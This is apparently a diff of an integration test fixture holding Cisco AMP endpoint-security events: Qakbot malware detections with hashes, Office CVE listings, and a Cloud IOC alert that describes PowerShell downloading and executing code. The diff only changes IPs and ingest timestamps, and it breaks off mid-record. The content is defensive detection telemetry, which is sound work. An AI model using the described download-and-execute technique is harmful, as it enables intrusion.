"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -2100,7 +2100,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -2136,7 +2136,7 @@ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2146,8 +2146,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322477067Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "ingested": "2021-12-09T13:35:29.222539400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2167,7 +2167,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2212,7 +2212,7 @@ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2222,8 +2222,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322479467Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "ingested": "2021-12-09T13:35:29.222545Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -2243,7 +2243,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2286,7 +2286,7 @@ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2300,8 +2300,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322481709Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "ingested": "2021-12-09T13:35:29.222550700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2323,7 +2323,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2370,7 +2370,7 @@ "5faebef3bb880489195e80e6656ccf442ff7123b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2384,8 +2384,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322483920Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", + "ingested": "2021-12-09T13:35:29.222556400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2407,7 +2407,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2454,7 +2454,7 @@ "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2464,8 +2464,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322486161Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", + "ingested": "2021-12-09T13:35:29.222562Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}", "code": "1107296279", "kind": "alert", "start": "2021-01-13T10:37:33.000Z", @@ -2486,7 +2486,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2618,7 +2618,7 @@ "Demo_AMP" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2628,8 +2628,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322488385Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222567700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -2646,7 +2646,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -2689,7 +2689,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2699,8 +2699,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322490604Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}", + "ingested": "2021-12-09T13:35:29.222573400Z", + "original": 